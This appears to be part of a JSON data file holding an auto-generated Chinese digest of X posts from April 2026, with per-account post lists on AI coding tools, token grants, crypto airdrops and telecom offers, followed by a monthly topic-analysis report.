搞定了✅\n[原文链接](https://x.com/Stv_Lynn/status/2048109922936910037)\n\n**[2026-04-25T18:40:31+00:00]**\n> Cursor 送的 10000 刀,我拿来做了什么 昨天被 @cursor_ai 投喂了,于是决定好好记录一下与 Cursor 3 共创的全部过程。以下是第一天花掉 121 刀的记录 1. 写了个主页 想起来上一个主页还是去年拿 opus-3.7 写的,刚好通过 Cursor 用 GPT-5.5 重构 (文案请忽略不代表最终效果) 感觉吃上细糠了!\n[原文链接](https://x.com/Stv_Lynn/status/2048109919266852875)\n\n**[2026-04-25T12:08:29+00:00]**\n> RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。 从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工…\n[原文链接](https://x.com/Stv_Lynn/status/2048011261473128477)\n\n**[2026-04-25T05:23:57+00:00]**\n> 忘了说了其实我也有👉👈 感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!\n[原文链接](https://x.com/Stv_Lynn/status/2047909458484040105)\n\n**[2026-04-24T03:37:07+00:00]**\n> R to @Stv_Lynn: api-docs.deepseek.com/zh-cn/…\n[原文链接](https://x.com/Stv_Lynn/status/2047520184408371233)\n\n**[2026-04-24T03:36:54+00:00]**\n> DeepSeek V4 支持了 FIM,也就是在一段文本的中间进行补全 很适合代码场景\n[原文链接](https://x.com/Stv_Lynn/status/2047520130499051872)\n\n**[2026-04-24T03:09:34+00:00]**\n> DeepSeek V4 终于生了!\n[原文链接](https://x.com/Stv_Lynn/status/2047513252171825530)\n\n**[2026-04-23T07:23:05+00:00]**\n> RT by @Stv_Lynn: GPT Image 2 is insanely good...I generated a 360° equirectangular panorama in Happycapy with just a skill + prompt. Step 1: Select the generate-image skill Step 2: Enter a prompt lik…\n[原文链接](https://x.com/Stv_Lynn/status/2047214663721681288)\n\n**[2026-04-22T15:04:18+00:00]**\n> 再这样下去 image2 估计很快就要被玩坏了 后面说不定要像 sora 一样加很多限制\n[原文链接](https://x.com/Stv_Lynn/status/2046968345170526386)\n\n---\n\n### ✅ @chuxiaeth — 初夏(8 条)\n\n**[2026-04-29T04:52:50+00:00]**\n> 🧵 最近主攻各平台的嘴撸创作者赛道,不卷且能稳定产出收益。这波参与的是 @MindoAI 和 @useTria 的联合活动 🎯 策略上我依然聚焦推文创作,辅以低磨损的轻交互。活动需要交易量和办卡,门槛确实比纯内容局高,但我不会去死磕资金堆量的维度,找准自己优势位最重要 📊 Tria交互链接:http://app.tria.so/?accessCode=3RPJYP7003&utm_source=…\n[原文链接](https://x.com/chuxiaeth/status/2049351176433623539)\n\n**[2026-04-28T08:48:42+00:00]**\n> Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。\n[原文链接](https://x.com/chuxiaeth/status/2049048148660965739)\n\n**[2026-04-28T08:38:27+00:00]**\n> 开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。 #TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。\n[原文链接](https://x.com/chuxiaeth/status/2049045566857064461)\n\n**[2026-04-28T08:30:58+00:00]**\n> R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误\n[原文链接](https://x.com/chuxiaeth/status/2049043685094907944)\n\n**[2026-04-28T08:25:44+00:00]**\n> 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海…\n[原文链接](https://x.com/chuxiaeth/status/2049042369530777747)\n\n**[2026-04-26T23:40:41+00:00]**\n> - @RiverdotInc 第五季创作者排名战正式打响🏆 赛季时间:4月22日 → 26年Q2结束📅 这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ 另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 @River4fun 💧 我也已经加入到第五季的战斗\n[原文链接](https://x.com/chuxiaeth/status/2048547844982976544)\n\n**[2026-04-26T23:33:15+00:00]**\n> - @ferra_protocol 居然也上贵金属永续合约了🥇 现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 交互链接: https://ferra.ag?code=tBYQfU0aq 进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀\n[原文链接](https://x.com/chuxiaeth/status/2048545974747070599)\n\n**[2026-04-26T02:36:06+00:00]**\n> 好久不见,宝子们,近来可好啊\n[原文链接](https://x.com/chuxiaeth/status/2048229604784308266)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @wolfyxbt — 杀破狼(17 条)\n\n**[2026-04-27T13:59:57+00:00]**\n> 最近想玩链游的可以看看 @RealGoOfficial 这个游戏 他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。 他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如…\n[原文链接](https://x.com/wolfyxbt/status/2048764088193569049)\n\n**[2026-04-27T01:55:58+00:00]**\n> 不要骂我了,山寨季已经来过了 $TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。 觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。 山寨币是赚钱容易而已,不是所有人都赚钱。\n[原文链接](https://x.com/wolfyxbt/status/2048581892333867398)\n\n**[2026-04-26T04:01:04+00:00]**\n> 嗨 @nikitabier @elonmusk 你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。 我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。\n[原文链接](https://x.com/wolfyxbt/status/2048250984644960630)\n\n**[2026-04-26T02:11:07+00:00]**\n> 卧槽,川普又被枪击了 😱\n[原文链接](https://x.com/wolfyxbt/status/2048223317019316568)\n\n**[2026-04-25T15:08:21+00:00]**\n> 因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。\n[原文链接](https://x.com/wolfyxbt/status/2048056527731454048)\n\n**[2026-04-25T13:32:07+00:00]**\n> R to @wolfyxbt: Image\n[原文链接](https://x.com/wolfyxbt/status/2048032308637442215)\n\n**[2026-04-25T13:30:27+00:00]**\n> 2019 年,孙哥放了巴菲特的鸽子; 2026 年,嗯哼放了特朗普的鸽子。 币圈真是个神奇的地方!\n[原文链接](https://x.com/wolfyxbt/status/2048031889789972748)\n\n**[2026-04-25T10:03:02+00:00]**\n> 虽然比特币回到 77,000 了,但是我还是非常悲观的 我理想中的抄底价格是 35,000 的比特币 感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。 这种底我根本不敢抄呀,抄在半山腰至少得难受一年。 感觉现在这种行情像是跌太…\n[原文链接](https://x.com/wolfyxbt/status/2047979690623955107)\n\n**[2026-04-25T08:01:04+00:00]**\n> 我靠 Cursor 刚刚送了我 10,000 美金的额度! 感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!\n[原文链接](https://x.com/wolfyxbt/status/2047948998250840240)\n\n**[2026-04-25T05:22:04+00:00]**\n> 我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。 平均算下来,每 1 次曝光有 0.000136 美金的收益; 每 1 万次曝光 1.36 美金的收益。\n[原文链接](https://x.com/wolfyxbt/status/2047908983101628720)\n\n**[2026-04-25T03:15:14+00:00]**\n> R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据\n[原文链接](https://x.com/wolfyxbt/status/2047877064104284194)\n\n**[2026-04-25T02:27:20+00:00]**\n> 卧槽!牛逼牛逼! 这两周的工资涨到了 1799 美金! Thank you Elon Musk!\n[原文链接](https://x.com/wolfyxbt/status/2047865010182148284)\n\n**[2026-04-24T13:29:31+00:00]**\n> 我也很爱吃瓜,但我觉得还是得理性吃瓜 昨天 Tron 上面有 3.44 亿的 $USDT 被 Tether 冻结了,有人说这是川普家族开始对孙哥进行打压了,但是这些钱跟孙哥和 Tron 基金会根本没有一点关系 😂 这些钱是柬埔寨参议员 Kok An 相关的一些资金,因为涉及了东南亚杀猪盘、网络诈骗和人口贩卖等等的犯罪,所以才被美国执法机构申请冻结了。 Tether 一直以来都会联合美国的执法机构…\n[原文链接](https://x.com/wolfyxbt/status/2047669267475419273)\n\n**[2026-04-24T07:56:02+00:00]**\n> SBF 的投资水平:Anthropic、Cursor、SpaceX CZ 的投资水平:SBF\n[原文链接](https://x.com/wolfyxbt/status/2047585341515993543)\n\n**[2026-04-24T03:56:02+00:00]**\n> 看到此推的所有人,现在立刻马上推荐我一个生活好物。\n[原文链接](https://x.com/wolfyxbt/status/2047524944280793505)\n\n**[2026-04-23T13:02:03+00:00]**\n> 福利姬宝宝们,快点出来, 集合了,来这个评论区集合,我有重要事情要宣布。\n[原文链接](https://x.com/wolfyxbt/status/2047299964158787623)\n\n**[2026-04-23T12:07:53+00:00]**\n> 有时候真的很敬佩打狗的 P 小将 你只要经常去扫链,先不说能不能赚钱,但你绝对能看到这个行业内最快最早的信息源(排除一些内部人士能提前知道的信息)。很多都是一些官方都还没发布的东西、还没上线的产品,或者是一些藏在文档和代码里的蛛丝马迹,都能给这些 P 小将给提前扒出来发个币。\n[原文链接](https://x.com/wolfyxbt/status/2047286333505515554)\n\n---\n\n### ✅ @runes_leo — Leo(19 条)\n\n**[2026-04-29T10:38:03+00:00]**\n> Anthropic ships changelogs. OpenAI ships vibes.\n[原文链接](https://x.com/runes_leo/status/2049438052310020226)\n\n**[2026-04-29T09:40:13+00:00]**\n> Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。 但通知再快也是要人读的。我并不想读。 我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。 懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断、给一行结论:这条 P0 现在去改 / …\n[原文链接](https://x.com/runes_leo/status/2049423498494566836)\n\n**[2026-04-29T08:16:00+00:00]**\n> 刚学习完罗福莉老师这场 3.5h 访谈发了中文解读, 转头就刷到她团队在送 100T tokens grant,立马提交申请。 表单做得对中文 builder 极友好: 工具栏 OpenClaw / Claude Code / Codex 排前三 模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产 下一步:把 MiMo V2.5 接进现有 Claud…\n[原文链接](https://x.com/runes_leo/status/2049402305217241384)\n\n**[2026-04-29T06:15:09+00:00]**\n> x.com/i/article/204902031072…\n[原文链接](https://x.com/runes_leo/status/2049371895267774715)\n\n**[2026-04-29T02:16:00+00:00]**\n> 群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。 听着像废话,但这个常识在 AI 时代变得尖锐—— 以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。 护城河从\"代码会写\"变成\"策略会想\"。 这件事我自己也在分层做—— polymarket-toolkit 我开源(仓库https://github.com/runesl…\n[原文链接](https://x.com/runes_leo/status/2049311708330459226)\n\n**[2026-04-28T23:38:00+00:00]**\n> 之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。 - Star ⭐ = 书签,零通知 - Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推 - Watch (Releases …\n[原文链接](https://x.com/runes_leo/status/2049271946022474215)\n\n**[2026-04-28T19:30:02+00:00]**\n> vision pro 连 mac 开带鱼屏,Polymarket 盯赔率变化,Codex 跑策略代码,再开个窗口看直播,get 到了新的看球姿势,提前为世界杯做准备😂\n[原文链接](https://x.com/runes_leo/status/2049209546091253870)\n\n**[2026-04-28T14:27:57+00:00]**\n> 升级了自己的 AI 视频管线把这个文字内容重做成 46 秒竖屏视频版。 全自动化 pipeline 操作的。大家觉得怎么样👀 之前开源的 claude-video-kit 详情见 https://x.com/runes_leo/status/2041395548234944600\n[原文链接](https://x.com/runes_leo/status/2049133521919484102)\n\n**[2026-04-28T12:23:41+00:00]**\n> 恭喜你们有职业定位了:AI 包工头 Agent Operator,未来 5 年每家公司都会需要的新岗位?说人话就是 AI 包工头——专门编排 AI agent 干活,核心 5 项技能:MCP / CLI / skills.md / AGENTS.md / 业务嗅觉。 但这不是新职业,是没起名字而已😆 翻了下自己这半年攒的工作流,他列的每一条都对得上号。中文圈靠 Claude Code 自己搭流程…\n[原文链接](https://x.com/runes_leo/status/2049102248719052964)\n\n**[2026-04-28T10:18:07+00:00]**\n> 从 Claude 转向 Codex 的越来越多了 我也有同感 没 100% 切到 Codex 是因为我还在双轨用: CC 写日常对话+内容/工具代码+工作流编排,Codex 做策略/数据代码+独立 review+verify。 两边各有强项,先一起用着看看👀\n[原文链接](https://x.com/runes_leo/status/2049070650481066377)\n\n**[2026-04-28T09:16:38+00:00]**\n> 本来要明天才能刷新的 codex 额度,突然又被提前重置了一轮 Codex 这点真有意思呀 周额度按理说 7 天一刷新,实际上隔几天就偷偷给你重置一次。 这到底是营销策略还是什么骚操作\n[原文链接](https://x.com/runes_leo/status/2049055175906931184)\n\n**[2026-04-28T08:16:00+00:00]**\n> Leo Labs 大群 4-28 群友讨论精华(最近 584 条) V2 cutover 5 小时后正式生效,群里这一天聊到的 4 件事记下来。 ━━━━━━━━━━━━ 1️⃣ V2 EOA 已实测可跑,但 redeem 路径有坑 • 4/27 上午有人 EOA 实盘 4h ≈ $20(V2 endpoint 已下单成功) • redeem 回来是 USDC.e,不是 pUSD,要交易得再 w…\n[原文链接](https://x.com/runes_leo/status/2049039917494231397)\n\n**[2026-04-28T06:39:23+00:00]**\n> R to @runes_leo: youtube.com/watch?v=6eBSHbLK…\n[原文链接](https://x.com/runes_leo/status/2049015605710491995)\n\n**[2026-04-28T06:39:23+00:00]**\n> 最近 X 上无数次刷到 @bcherny (Claude Code 作者)的演讲《Mastering Claude Code in 30 minutes》(30 分钟用好 Claude Code)——溯源才发现,其实是一年前的内容。 两点感受: - 好内容生命力是真长,一年了依然有这种传播力 - 大家对\"怎么用好 AI\"的方法论焦虑,在数据上肉眼可见 前两天我专门做了个中文字幕版,有需要的可以看…\n[原文链接](https://x.com/runes_leo/status/2049015602073989130)\n\n**[2026-04-28T06:01:37+00:00]**\n> R to @runes_leo: 第4章:跑了几个月策略,回头对 PnL 报表觉得不对劲。 拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。 亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。 要不要也拉一遍你自己的对账? https://x.com/runes_leo/status/2049004801078300881?s=20 ——— 付费连载 7 章里…\n[原文链接](https://x.com/runes_leo/status/2049006099173626041)\n\n**[2026-04-28T05:57:43+00:00]**\n> 跑了几个月策略,回头对 PnL 报表觉得不对劲。 拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。 亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。 要不要也拉一遍你自己的对账? ——— 付费连载 7 章里的第 4 章。链接里有完整版 + 源码包 + 读者群,订阅 X 也可以持续追读。 https://leolabs.me/pm-quant#/pm-quant\n[原文链接](https://x.com/runes_leo/status/2049005119069667522)\n\n**[2026-04-28T04:38:00+00:00]**\n> 卧槽,不用 ChatGPT 改一遍简历就要被算法刷掉? 这条 22k 赞推文说有论文证明:AI 筛简历 97.6% 偏向 ChatGPT 改写版,GPT-4o 自偏好 97.6% / LLaMA 96.3% / DeepSeek 95.5%——原推还说 99% 大公司用 AI 筛、多数用 GPT-4o,所以你写的简历直接被算法歧视。 去 arxiv 翻了原论文(2509.00462,AAAI/A…\n[原文链接](https://x.com/runes_leo/status/2048985055842730341)\n\n**[2026-04-28T02:27:00+00:00]**\n> 看完这条想冲去把 CLAUDE.md 改长——先别。 第二条实锤同意,Anthropic 自己 system prompt 几千 tokens,让用户写短是为了它自己留空间。 但我认为「长 vs 短」不是真问题,「能否被自动加载 + 关键词 trigger」才是。 我的 setup:rules/ 自动加载 + docs/ 按场景加载 + 关键词 trigger 写在 CLAUDE.md 主文件。…\n[原文链接](https://x.com/runes_leo/status/2048952088361918479)\n\n**[2026-04-28T00:16:00+00:00]**\n> 3 周前立了个 flag:跑数据验证 4 条 Claude Code 缓存优化(/clear 改话题切换 / MEMORY.md 推迟 / 模型阶段切换 / /btw 长任务插问)。 今天等长滑窗对比 4 周。 · 命中率 96.7% → 96.3%(噪声内) · Msg/Session 118 → 137(W17 反而更长) · 4 条规则大部分是追认我本来就这样用 真正涨的不是 cache …\n[原文链接](https://x.com/runes_leo/status/2048919121115631642)\n\n---\n\n### ⚠️ @oranges — 比特币橙子(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @realNyarime — 奶昔(20 条)\n\n**[2026-04-29T08:43:53+00:00]**\n> R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证\n[原文链接](https://x.com/realNyarime/status/2049409325098238125)\n\n**[2026-04-29T08:41:13+00:00]**\n> 据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。 原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。…\n[原文链接](https://x.com/realNyarime/status/2049408651660755063)\n\n**[2026-04-29T07:15:58+00:00]**\n> 裤袜是裤子还是袜子?\n[原文链接](https://x.com/realNyarime/status/2049387196311105556)\n\n**[2026-04-29T02:54:33+00:00]**\n> RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。 关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。 如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行! 感谢大家的支持!🥰\n[原文链接](https://x.com/realNyarime/status/2049321411420811479)\n\n**[2026-04-29T02:39:00+00:00]**\n> 好消息:沪爷可以去金马了 坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注\n[原文链接](https://x.com/realNyarime/status/2049317496361292240)\n\n**[2026-04-29T01:15:23+00:00]**\n> 昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月 支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情 接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!\n[原文链接](https://x.com/realNyarime/status/2049296454905393361)\n\n**[2026-04-28T15:53:07+00:00]**\n> 最赚钱的莫过于,帮别人开Claude被封全额退款再抽个20%的水 难怪A/那么多人用,原来是全民退款流\n[原文链接](https://x.com/realNyarime/status/2049154953483370544)\n\n**[2026-04-28T14:03:32+00:00]**\n> CMLink英国卡老用户可在【无忧行英国版JegoTrip-CMLink】领20G本地流量包 另外CMLink UK下架eSIM,要求补卡要激活一个月才能补,估计是防止国内用户下单抢名额\n[原文链接](https://x.com/realNyarime/status/2049127378815942981)\n\n**[2026-04-28T10:19:02+00:00]**\n> Xiaomi MiMo V2.5包含旗舰推理模型、多模态模型和语音合成模型,MiMo API 开放平台面向全球用户提供 API 推理服务,可直接对接Claude Code、Cursor、OpenClaw等主流编程工具 还是有点期待的,如果有OpenClaw需求的同学们可以考虑提交自己的GitHub或项目官网+100字以上小作文申请 北京时间2026年4月28日至5月28日,共 30 天,赠完即止…\n[原文链接](https://x.com/realNyarime/status/2049070878961656082)\n\n**[2026-04-28T09:32:15+00:00]**\n> 是谁污染了icu后缀域名???\n[原文链接](https://x.com/realNyarime/status/2049059109258010927)\n\n**[2026-04-28T09:10:49+00:00]**\n> 中国移动CMLink UK(小移在英国)发布官方App【JegoTrip-CMLink】 由JegoTrip无忧行团队负责开发,仅提供用量、话费查询,不过也可以领免费eSIM 1)5月31日之前,下载并登录App可获得20GB英国本地流量,7个工作日内到账有效期28天 2)新用户可领取eSIM一张,此卡可在中国香港、英国及欧盟进行激活,或使用英国IP代理下拉起WiFi通话(VoWiFi)激活号卡…\n[原文链接](https://x.com/realNyarime/status/2049053713642471580)\n\n**[2026-04-28T08:44:43+00:00]**\n> 其实我最遗憾的是,帝国时代Online为什么下掉了,最怀念的是AOE2那会跟同学拿着U盘拷副本,然后在电脑课教室的局域网里面联机,回家后还用浩方周末组队 记得我最喜欢的是拜占庭,我的发小会选哥特跟我联盟,至于其他小伙伴就是按照他们的习惯选择。不过后面就都各奔东西,唯独我的世界、幻兽帕鲁这类的联机游戏又齐聚一堂 如果可以的话,还是希望这辈子能看到微软把帝国时代Online给重新上架,总感觉后来重制…\n[原文链接](https://x.com/realNyarime/status/2049047146146754812)\n\n**[2026-04-28T08:19:18+00:00]**\n> 五一节快到了,听说N卡上网最快了\n[原文链接](https://x.com/realNyarime/status/2049040750860812765)\n\n**[2026-04-28T06:55:53+00:00]**\n> 谷歌反重力家庭组不能一拖多,改成跟号主共享额度,看来Google Antigravity也被薅怕了\n[原文链接](https://x.com/realNyarime/status/2049019755336704210)\n\n**[2026-04-28T05:59:08+00:00]**\n> R to @realNyarime: 随行WiFiX配置的聚合频宽是100+100+100+90,虽然北京地铁配置的是100+60+100+60\n[原文链接](https://x.com/realNyarime/status/2049005476243993029)\n\n**[2026-04-28T05:30:05+00:00]**\n> 华为随身WiFi X目前只有移动版,机卡绑定、白名单机制仅识别移动卡,物联网卡和其他运营商都用不了 另外直播神器号卡「移动直播臻享卡」只能在这台随身WiFi上用,具体套餐及机制可参考博主「小武是我」发布的视频 感谢通信人家园「玩耍天使」提供的测试数据,在北京地铁12号线实测79C+41C 4cc载波聚合 ,或许华为定高价是为了给友商活路\n[原文链接](https://x.com/realNyarime/status/2048998165031043180)\n\n**[2026-04-28T05:06:23+00:00]**\n> 之前闲鱼95折收的号内E卡,帮我代下单。昨天派出所给我打电话,让我今天去做笔录,还问我买的东西在不在,是不是想让我退赃 于是早上8点到就到派出所做笔录,花了2个小时。和民警了解到,受害人是被骗了10多万的大润发卡,10500的京东E卡,京东E卡分别给10来个人下单,我是其中一个 笔录上把我当成刑事案件的证人,写了我买E卡的过程,提供了卖E卡人的相关信息 涉案的E卡,和我有关的只有1700多元,还…\n[原文链接](https://x.com/realNyarime/status/2048992199208251709)\n\n**[2026-04-28T01:48:44+00:00]**\n> 嗯?快连(LetsVPN)跟老王VPN不一个背景的吗\n[原文链接](https://x.com/realNyarime/status/2048942460630688174)\n\n**[2026-04-28T00:53:36+00:00]**\n> 境外组织挑动男女对立 境外组织大力资助网红煽动躺平 境外组织炮制“阶层固化”与“努力无用”论调 境外组织全方位煽动各类“社会群体对立” 境外组织利用“环保”、“动保”或“平权”等特定议题进行渗透 对,都是海外势力搞得,我们是不可能存在任何缺点的! 考公务员躺平没用,公务员是全世界最辛苦的职业,每天上24小时的班,还没下班又接着上班了\n[原文链接](https://x.com/realNyarime/status/2048928584379822356)\n\n**[2026-04-27T16:21:57+00:00]**\n> 美团旗下龙猫新模型LongCat-2.0-Preview专属额度,内测期间将根据负载情况每日不定期多次刷新,新模型限时申请👉https://longcat.chat/platform 每天1000万token额度,差不多2小时重置一下额度,使劲薅! 另外还有几个模型LongCat-Flash-Chat、 LongCat-Flash-Thinking-2601、 LongCat-Flash-Omn…\n[原文链接](https://x.com/realNyarime/status/2048799821746897247)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-29T10:59:43.472886+00:00\n**分析账号**: 44个 | **活跃账号**: 37个 | **推文总量**: 513条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:350 条\n- **模型能力**:115 条\n- **交易与市场**:20 条\n- **算力与芯片**:15 条\n- **投融资与并购**:13 条\n\n## 三、活跃账号 Top10\n\n- @bozhou_ai: 20 条\n- @dingyi: 20 条\n- @paulg: 20 条\n- @realNyarime: 20 条\n- @berryxia: 20 条\n- @elonmusk: 20 条\n- @lxfater: 20 条\n- @sama: 20 条\n- @HarryStebbings: 20 条\n- @jason: 20 条\n\n## 四、代表性推文\n\n- @runes_leo | 2026-04-29T10:38:03+00:00\n - Anthropic ships changelogs. OpenAI ships vibes.\n - https://x.com/runes_leo/status/2049438052310020226\n- @bozhou_ai | 2026-04-29T10:33:21+00:00\n - Warp 昨晚开源了。 GitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。 Warp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,…\n - https://x.com/bozhou_ai/status/2049436870963085429\n- @bozhou_ai | 2026-04-29T10:32:33+00:00\n - MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。 cyrilXBT 整理的清单,分四类。 【基础】 1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法 https://cs.nyu.edu/~mohri/mlbook/ 2. …\n - https://x.com/bozhou_ai/status/2049436668663390575\n- @runes_leo | 2026-04-29T09:40:13+00:00\n - Claude Code 加了 push 通知,任务跑完手机叫你,让你能从终端走开。 但通知再快也是要人读的。我并不想读。 我有几个 TG 频道接监控,策略告警/异常/系统/信号分开收,每天未读消息几十条。但还是要我自己打开看:是真需要动手处理,还是又一次正常状态监控。这跟没提醒区别不大。 懒人的真需求不是\"通知更快\",是 AI 替我读完那条告警,归类、判断…\n - https://x.com/runes_leo/status/2049423498494566836\n- @dingyi | 2026-04-29T09:38:53+00:00\n - 这个动效设计 skills 真好! npx skills add jakubantalik/transitions-dev\n - https://x.com/dingyi/status/2049423162933395583\n- @CuiMao | 2026-04-29T09:35:28+00:00\n - 国内自媒体真的赢麻了,随便说点deepseek V4 的好话就大几万播放,要是再加点黄仁勋彻底失败,美国AI走向灭亡,要是再懂点的,分析下中美能源对比,在喊一句华为取代英伟达成为全球霸主彻底改写世界AI格局,这视频直接奔着几十万播放去的。\n - https://x.com/CuiMao/status/2049422304338444773\n- @paulg | 2026-04-29T09:13:21+00:00\n - R to @paulg: Why do I assume his successors will be more principled? Partly because almost everyone is, even in politics. And partly because if they aren't, it won't matter much w…\n - https://x.com/paulg/status/2049416736806449649\n- @paulg | 2026-04-29T09:11:10+00:00\n - R to @paulg: He'll leave the opposite legacy. His more principled successors will have a harder time getting things done, because of the walls everyone has built to protect agains…\n - https://x.com/paulg/status/2049416188568949159\n- @paulg | 2026-04-29T09:09:13+00:00\n - Trump's bullying only works (and only temporarily at that) because he's taking advantage of the high-trust customs and relationships established by more principled predecessors.\n - https://x.com/paulg/status/2049415696694587729\n- @GoSailGlobal | 2026-04-29T09:07:13+00:00\n - 做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来 数据库现在 67,196 个项目 跑了一遍分布分析,结果让我自己愣了 30 秒: - 基尼系数 0.983(破 AppStore、npm、YouTube 纪录) - 54.1% 的项目是 0 star——不是「少 sta…\n - https://x.com/GoSailGlobal/status/2049415194372342164\n- @realNyarime | 2026-04-29T08:43:53+00:00\n - R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证\n - https://x.com/realNyarime/status/2049409325098238125\n- @realNyarime | 2026-04-29T08:41:13+00:00\n - 据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。 原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和…\n - https://x.com/realNyarime/status/2049408651660755063\n- @GoSailGlobal | 2026-04-29T08:40:25+00:00\n - R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组 大家可以圆桌讨论,简单易用\n - https://x.com/GoSailGlobal/status/2049408452079046944\n- @GoSailGlobal | 2026-04-29T08:40:22+00:00\n - R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory 还可以支持第三方模型\n - https://x.com/GoSailGlobal/status/2049408436597899361\n- 